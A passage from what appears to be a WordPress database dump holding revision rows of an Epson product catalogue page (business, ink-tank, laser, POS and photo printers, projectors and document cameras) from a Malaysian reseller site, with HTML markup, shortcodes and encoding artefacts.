robotics.</p><h3>Printers for Work</h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h3>BUSINESS INKJET PRINTER</h3>		\n		<p><strong>Epson WorkForce Enterprise WF-C17590Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul><p>[maxbutton id=\"12\" ]</p><p><strong>Epson WorkForce Pro WF-C5290Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><p>[maxbutton id=\"12\" ]</p><p><strong>Epson WorkForce WF-100Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul><p>[maxbutton id=\"12\" ]</p><p><strong>Epson WorkForce WF-7711</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /></p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.</p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Duplex printing up to A3 size</li><li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li><li>4.3â€ Colour LCD Touch Panel</li><li>Print, Scan, Copy Fax with ADF</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INK TANK SYSTEM</h3>		\n		<p><strong>Epson EcoTank L3150</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L120 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson M1100 Printer</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>LASER PRINTER</h3>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p>Epson EB-2142WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p>Epson EB-L500WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p>Epson LightScene EV-105</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p>Epson EB-1785WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p>Epson EB-536WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p>Epson 595Wi/585Wi/575WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p>Epson EB-L1405UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p>Epson EB-G7400UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p>Epson EB-Z10000UÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p>Document Camera ELPDC21Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2018-12-24 14:31:02','2018-12-24 06:31:02','',1486,'https://bintara.com.my/blog/2018/12/24/1486-revision-v1/',0,'revision','',0),(2759,1,'2018-12-24 14:31:59','2018-12-24 06:31:59','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h3>Printers for Work</h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h3>BUSINESS INKJET PRINTER</h3>		\n		<p><strong>Epson WorkForce Enterprise WF-C17590Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul><p>[maxbutton id=\"12\" ]</p><p><strong>Epson WorkForce Pro WF-C5290Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><p>[maxbutton id=\"12\" ]</p><p><strong>Epson WorkForce WF-100Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul><p>[maxbutton id=\"12\" ]</p><p><strong>Epson WorkForce WF-7711</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /></p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.</p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Duplex printing up to A3 size</li><li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li><li>4.3â€ Colour LCD Touch Panel</li><li>Print, Scan, Copy Fax with ADF</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INK TANK SYSTEM</h3>		\n		<p><strong>Epson EcoTank L3150</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L120 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson M1100 Printer</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>LASER PRINTER</h3>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with 